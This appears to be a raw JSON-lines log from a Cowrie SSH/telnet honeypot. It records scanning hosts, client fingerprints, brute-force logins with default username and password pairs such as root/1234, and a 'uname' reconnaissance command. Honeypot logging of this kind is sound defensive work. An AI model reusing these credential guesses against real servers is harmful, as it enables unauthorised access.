{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.422372Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56755,"dst_ip":"1.2.3.4","dst_port":23,"session":"236bb8bed7e4","protocol":"telnet","message":"New connection: 113.229.80.250:56755 (1.2.3.4:23) [session: 236bb8bed7e4]","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.426431Z"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.466479Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:37:31.561715Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.562501Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.577390Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:31.578394Z","src_ip":"217.154.1.158","session":"cb6a70f86e0a"}
{"eventid":"cowrie.session.closed","duration":12.706061840057373,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:33.269469Z","src_ip":"113.229.80.250","session":"539b8a60ff0d"}
{"eventid":"cowrie.session.closed","duration":12.686091184616089,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:33.270373Z","src_ip":"113.229.80.250","session":"dbc613b2b26c"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56765,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae216250c094","protocol":"telnet","message":"New connection: 113.229.80.250:56765 (1.2.3.4:23) [session: ae216250c094]","sensor":"my-vps","timestamp":"2025-08-26T19:37:33.431461Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56766,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f309c3a5f83","protocol":"telnet","message":"New connection: 113.229.80.250:56766 (1.2.3.4:23) [session: 3f309c3a5f83]","sensor":"my-vps","timestamp":"2025-08-26T19:37:33.475889Z"}
{"eventid":"cowrie.session.closed","duration":13.433461904525757,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:36.466107Z","src_ip":"113.229.80.250","session":"a484622f40fa"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56775,"dst_ip":"1.2.3.4","dst_port":23,"session":"c90316ecec64","protocol":"telnet","message":"New connection: 113.229.80.250:56775 (1.2.3.4:23) [session: c90316ecec64]","sensor":"my-vps","timestamp":"2025-08-26T19:37:36.571274Z"}
{"eventid":"cowrie.session.closed","duration":12.770209074020386,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:44.196566Z","src_ip":"113.229.80.250","session":"236bb8bed7e4"}
{"eventid":"cowrie.session.closed","duration":12.714319705963135,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:46.190120Z","src_ip":"113.229.80.250","session":"3f309c3a5f83"}
{"eventid":"cowrie.session.closed","duration":12.761626243591309,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:46.193001Z","src_ip":"113.229.80.250","session":"ae216250c094"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56934,"dst_ip":"1.2.3.4","dst_port":23,"session":"c432c9d15b14","protocol":"telnet","message":"New connection: 113.229.80.250:56934 (1.2.3.4:23) [session: c432c9d15b14]","sensor":"my-vps","timestamp":"2025-08-26T19:37:46.399713Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56935,"dst_ip":"1.2.3.4","dst_port":23,"session":"74bab14309f4","protocol":"telnet","message":"New connection: 113.229.80.250:56935 (1.2.3.4:23) [session: 74bab14309f4]","sensor":"my-vps","timestamp":"2025-08-26T19:37:47.407258Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40648,"dst_ip":"1.2.3.4","dst_port":22,"session":"289622fdb16d","protocol":"ssh","message":"New connection: 217.154.1.158:40648 (1.2.3.4:22) [session: 289622fdb16d]","sensor":"my-vps","timestamp":"2025-08-26T19:37:48.704099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:37:48.705357Z","src_ip":"217.154.1.158","session":"289622fdb16d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:37:48.719697Z","src_ip":"217.154.1.158","session":"289622fdb16d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:37:48.764457Z","src_ip":"217.154.1.158","session":"289622fdb16d"}
{"eventid":"cowrie.session.closed","duration":12.793623685836792,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:49.364825Z","src_ip":"113.229.80.250","session":"c90316ecec64"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":56953,"dst_ip":"1.2.3.4","dst_port":23,"session":"049a42aa41ce","protocol":"telnet","message":"New connection: 113.229.80.250:56953 (1.2.3.4:23) [session: 049a42aa41ce]","sensor":"my-vps","timestamp":"2025-08-26T19:37:49.575258Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:49.783158Z","src_ip":"217.154.1.158","session":"289622fdb16d"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":60506,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae428ea79984","protocol":"ssh","message":"New connection: 199.195.248.191:60506 (1.2.3.4:22) [session: ae428ea79984]","sensor":"my-vps","timestamp":"2025-08-26T19:37:56.728820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:37:56.734994Z","src_ip":"199.195.248.191","session":"ae428ea79984"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:37:56.820242Z","src_ip":"199.195.248.191","session":"ae428ea79984"}
{"eventid":"cowrie.login.failed","username":"github","password":"github","message":"login attempt [github/github] failed","sensor":"my-vps","timestamp":"2025-08-26T19:37:57.169919Z","src_ip":"199.195.248.191","session":"ae428ea79984"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:58.264197Z","src_ip":"199.195.248.191","session":"ae428ea79984"}
{"eventid":"cowrie.session.closed","duration":12.969632387161255,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:37:59.369280Z","src_ip":"113.229.80.250","session":"c432c9d15b14"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57105,"dst_ip":"1.2.3.4","dst_port":23,"session":"653ba1bc2592","protocol":"telnet","message":"New connection: 113.229.80.250:57105 (1.2.3.4:23) [session: 653ba1bc2592]","sensor":"my-vps","timestamp":"2025-08-26T19:37:59.577126Z"}
{"eventid":"cowrie.session.closed","duration":12.820032358169556,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:00.227205Z","src_ip":"113.229.80.250","session":"74bab14309f4"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57116,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9dc1f93c9a6","protocol":"telnet","message":"New connection: 113.229.80.250:57116 (1.2.3.4:23) [session: b9dc1f93c9a6]","sensor":"my-vps","timestamp":"2025-08-26T19:38:00.396823Z"}
{"eventid":"cowrie.session.closed","duration":12.631630182266235,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:02.206814Z","src_ip":"113.229.80.250","session":"049a42aa41ce"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57217,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa42e0f332b8","protocol":"telnet","message":"New connection: 113.229.80.250:57217 (1.2.3.4:23) [session: fa42e0f332b8]","sensor":"my-vps","timestamp":"2025-08-26T19:38:02.395850Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":38826,"dst_ip":"1.2.3.4","dst_port":22,"session":"b353f3992758","protocol":"ssh","message":"New connection: 217.154.1.158:38826 (1.2.3.4:22) [session: b353f3992758]","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.128178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.129070Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.144074Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.187238Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:38:06.277559Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.278237Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.295593Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:06.296608Z","src_ip":"217.154.1.158","session":"b353f3992758"}
{"eventid":"cowrie.session.closed","duration":12.5766019821167,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:12.153654Z","src_ip":"113.229.80.250","session":"653ba1bc2592"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57350,"dst_ip":"1.2.3.4","dst_port":23,"session":"649c02ccf19d","protocol":"telnet","message":"New connection: 113.229.80.250:57350 (1.2.3.4:23) [session: 649c02ccf19d]","sensor":"my-vps","timestamp":"2025-08-26T19:38:12.319133Z"}
{"eventid":"cowrie.session.closed","duration":12.852582931518555,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:13.249339Z","src_ip":"113.229.80.250","session":"b9dc1f93c9a6"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57389,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b985bc9d4d6","protocol":"telnet","message":"New connection: 113.229.80.250:57389 (1.2.3.4:23) [session: 5b985bc9d4d6]","sensor":"my-vps","timestamp":"2025-08-26T19:38:13.416175Z"}
{"eventid":"cowrie.session.closed","duration":12.812803506851196,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:15.207718Z","src_ip":"113.229.80.250","session":"fa42e0f332b8"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56128,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5535718bf8d","protocol":"ssh","message":"New connection: 217.154.1.158:56128 (1.2.3.4:22) [session: d5535718bf8d]","sensor":"my-vps","timestamp":"2025-08-26T19:38:23.576783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:38:23.577846Z","src_ip":"217.154.1.158","session":"d5535718bf8d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:38:23.591015Z","src_ip":"217.154.1.158","session":"d5535718bf8d"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:38:23.645815Z","src_ip":"217.154.1.158","session":"d5535718bf8d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:24.663287Z","src_ip":"217.154.1.158","session":"d5535718bf8d"}
{"eventid":"cowrie.session.closed","duration":12.777740478515625,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:25.096805Z","src_ip":"113.229.80.250","session":"649c02ccf19d"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57564,"dst_ip":"1.2.3.4","dst_port":23,"session":"ced1f74690ce","protocol":"telnet","message":"New connection: 113.229.80.250:57564 (1.2.3.4:23) [session: ced1f74690ce]","sensor":"my-vps","timestamp":"2025-08-26T19:38:25.281315Z"}
{"eventid":"cowrie.session.closed","duration":12.711852550506592,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:26.127932Z","src_ip":"113.229.80.250","session":"5b985bc9d4d6"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57568,"dst_ip":"1.2.3.4","dst_port":23,"session":"4da040782736","protocol":"telnet","message":"New connection: 113.229.80.250:57568 (1.2.3.4:23) [session: 4da040782736]","sensor":"my-vps","timestamp":"2025-08-26T19:38:26.436730Z"}
{"eventid":"cowrie.session.closed","duration":12.738672256469727,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:38.019885Z","src_ip":"113.229.80.250","session":"ced1f74690ce"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57731,"dst_ip":"1.2.3.4","dst_port":23,"session":"36fe70cfc1d0","protocol":"telnet","message":"New connection: 113.229.80.250:57731 (1.2.3.4:23) [session: 36fe70cfc1d0]","sensor":"my-vps","timestamp":"2025-08-26T19:38:38.207399Z"}
{"eventid":"cowrie.session.closed","duration":12.610059022903442,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:39.046721Z","src_ip":"113.229.80.250","session":"4da040782736"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57737,"dst_ip":"1.2.3.4","dst_port":23,"session":"e440acd91c23","protocol":"telnet","message":"New connection: 113.229.80.250:57737 (1.2.3.4:23) [session: e440acd91c23]","sensor":"my-vps","timestamp":"2025-08-26T19:38:39.145986Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":57440,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0535fcd112e","protocol":"ssh","message":"New connection: 217.154.1.158:57440 (1.2.3.4:22) [session: d0535fcd112e]","sensor":"my-vps","timestamp":"2025-08-26T19:38:40.974773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:38:40.976325Z","src_ip":"217.154.1.158","session":"d0535fcd112e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:38:40.990627Z","src_ip":"217.154.1.158","session":"d0535fcd112e"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-26T19:38:41.035074Z","src_ip":"217.154.1.158","session":"d0535fcd112e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:42.052059Z","src_ip":"217.154.1.158","session":"d0535fcd112e"}
{"eventid":"cowrie.session.closed","duration":12.757093667984009,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:50.964409Z","src_ip":"113.229.80.250","session":"36fe70cfc1d0"}
{"eventid":"cowrie.session.closed","duration":12.804527282714844,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:38:51.950443Z","src_ip":"113.229.80.250","session":"e440acd91c23"}
{"eventid":"cowrie.session.connect","src_ip":"113.229.80.250","src_port":57902,"dst_ip":"1.2.3.4","dst_port":23,"session":"61174e2f9153","protocol":"telnet","message":"New connection: 113.229.80.250:57902 (1.2.3.4:23) [session: 61174e2f9153]","sensor":"my-vps","timestamp":"2025-08-26T19:38:55.163540Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":56792,"dst_ip":"1.2.3.4","dst_port":22,"session":"49c6cd7a237c","protocol":"ssh","message":"New connection: 217.154.1.158:56792 (1.2.3.4:22) [session: 49c6cd7a237c]","sensor":"my-vps","timestamp":"2025-08-26T19:38:58.241476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:38:58.242141Z","src_ip":"217.154.1.158","session":"49c6cd7a237c"}
